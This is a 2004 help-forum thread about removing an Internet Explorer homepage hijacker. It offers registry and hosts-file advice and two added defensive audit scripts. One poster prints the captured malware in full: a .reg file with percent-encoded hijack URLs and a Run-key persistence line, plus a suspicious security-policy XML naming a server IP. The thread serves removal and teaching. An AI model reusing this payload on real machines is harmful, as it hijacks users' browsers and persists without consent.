Solved

Unknown virus or malicious file

Posted on 2004-04-27
12
4,270 Views
Last Modified: 2007-12-19
I have a serious problem. I believe I've been infected by something that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run improperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage, as soon as I close the program and open it again it's back to freednshost.info. Also, every time I click a link on any Internet webpage it will send me to that same page, freednshost.info, and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolicited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.

I've tried everything. I've scanned my computer, looked for the infected file manually, and I've downloaded the latest virus definitions for my Norton Antivirus, but it doesn't seem to help.
What do I do?
Question by:datinfo
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, first update them and then run:

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml 

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html 
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove freednshost.info. Before doing that, back up your registry.
0
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0

 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the hosts file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
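The accepted answer says to check that the hosts file carries nothing but the localhost line. As an added example (not code from the thread or from any of its posters), here is a small parser and audit for that file. It assumes the standard hosts layout, in which each line is an address followed by one or more names, with `#` starting a comment. It goes a little beyond the answer: any name mapped to a loopback address is reported as "blackholed" (the way a hijacker can silence an update site), any name mapped elsewhere is reported as "redirected", and IPv6 `::1 localhost` is accepted alongside `127.0.0.1`. The sample input is constructed and uses placeholder names.

```python
import ipaddress

# Constructed sample hosts file: the stock loopback line plus two lines of the
# kind a browser hijacker adds. The names and addresses are placeholders.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
203.0.113.10    search.example       # constructed: search site sent elsewhere
127.0.0.1       liveupdate.example   # constructed: update site silenced
"""


def parse_hosts(text):
    """Return (line_number, address, [names]) for every non-comment line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        entries.append((lineno, parts[0], parts[1:]))
    return entries


def audit_hosts(text):
    """Report every mapping other than loopback -> localhost.

    Each finding is (line_number, address, name, reason)."""
    findings = []
    for lineno, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append((lineno, addr, " ".join(names), "malformed address"))
            continue
        for name in names:
            # The only line a clean hosts file needs: loopback -> localhost
            # (127.0.0.1 or ::1 both count as loopback).
            if name.lower() == "localhost" and ip.is_loopback:
                continue
            if ip.is_loopback:
                findings.append((lineno, addr, name, "name blackholed to loopback"))
            else:
                findings.append((lineno, addr, name, "name redirected to " + addr))
    return findings


if __name__ == "__main__":
    for lineno, addr, name, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {addr} {name}: {reason}")
```

Run it against a real file with `audit_hosts(open(path).read())`, using the path for the Windows version from the answer above; an empty result means the file holds only the loopback entry.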
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Of course I should be online. LOL !!
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
0
 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of all: the "RUN" keys
(RUN/RUNONCE). In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value, e.g.
            sys    REG_SZ  "regedit -s sys.reg"
Delete this, and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated; same with e.g. WINNT\system32. The last files updated should only be the Performance log files.

Your "sys.reg" is downloaded from a site that I am trying to find. The problem is that it first installs itself as an IE "Cookie" in the Temporary Internet Files, and then after a while it is moved. I had the following installed on February 26, to wake up on April 17 at 19:40, and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
      <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the IP address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid changes of the RUN keys; some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious, and most believe that viruses spread with mail attachments.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase, rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made; e.g. the fssm32.exe above would not be FssM32.exe, so KILL IT.

Make your own search page and distribute this, or force everyone to Google, then "Brand" IE; that inhibits all users from changing search page, homepage and security settings.
0
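The .reg file quoted above hides the hijacker's hostname by percent-encoding every character of the URL, and it persists through a Run key that re-imports the same file at each logon. As an added example (not code from the thread or from knuthf), here is a small audit that parses a REGEDIT4-style export, decodes any percent-encoded Internet Explorer URL so the real host is visible, flags it as obfuscated when the decoded form differs from the stored one, and reports every Run/RunOnce value so the persistence line stands out. The sample export is constructed and uses a placeholder domain, `hijacker.example`, in the same layout as the real one; the parser handles plain quoted strings and `dword:` values, which is all this kind of export contains.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample in the layout of the export quoted in the thread.
# The domain (hijacker.example) and the aid value are placeholders.
SAMPLE_REG = r'''REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%68%69%6A%61%63%6B%65%72%2E%65%78%61%6D%70%6C%65/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%68%69%6A%61%63%6B%65%72%2E%65%78%61%6D%70%6C%65/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
'''

SECTION_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

# Key fragments matched case-insensitively against the full key path.
IE_KEYS = ("Internet Explorer\\Main", "Internet Explorer\\Search",
           "Internet Explorer\\SearchURL")
RUN_KEYS = ("CurrentVersion\\Run", "CurrentVersion\\RunOnce")


def parse_reg(text):
    """Yield (key_path, value_name, data) from a REGEDIT4/5 export.

    Only quoted string data and dword: data are handled; backslash escapes
    inside string data are not unescaped (the sample needs none)."""
    entries = []
    key = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("REGEDIT", "Windows Registry Editor")):
            continue
        m = SECTION_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name, data = m.groups()
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1]
            entries.append((key, name, data))
    return entries


def audit_reg(text):
    """Flag IE start/search URLs (decoded) and every autorun value."""
    findings = []
    for key, name, data in parse_reg(text):
        upper = key.upper()
        if any(k.upper() in upper for k in IE_KEYS):
            decoded = unquote(data)          # reverse the %XX obfuscation
            findings.append({
                "kind": "ie-setting", "key": key, "name": name,
                "url": decoded,
                "host": urlsplit(decoded).hostname or "",
                "obfuscated": decoded != data,
            })
        elif any(k.upper() in upper for k in RUN_KEYS):
            findings.append({
                "kind": "autorun", "key": key, "name": name, "command": data,
            })
    return findings


if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG):
        if f["kind"] == "ie-setting":
            flag = " (percent-encoded)" if f["obfuscated"] else ""
            print(f'{f["name"]}: {f["host"]}{flag}  [{f["key"]}]')
        else:
            print(f'autorun {f["name"]}: {f["command"]}  [{f["key"]}]')
```

Feed it an export made with `regedit /e` of the keys listed earlier in the thread; the decoded host is what to look for in the hosts file and in the registry keys above, and any autorun entry whose command is `regedit -s <file>` is the re-infection mechanism knuthf describes.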
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumbo jumbo talking.
Please beware: it is a virus that will set IE to search somewhere else.
0
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 

Expert Comment

by:mormanb
ID: 11136352
I am not able to delete the vsconfig.xml. It says the process is being used by another process. I restored my registry; how can I get rid of this vsconfig.xml?
0
 

Expert Comment

by:knuthf
ID: 11163949
Rename it to e.g. vsconfig.xml.vir and designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust and inhibit these from being loaded at boot-up. You can now inspect them with suitable tools, and if the file is e.g. part of MS administrative tools, then you just rename the file back to vsconfig.xml...
0
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml, described in another posting; here the first and fourth characters are in upper case.
0
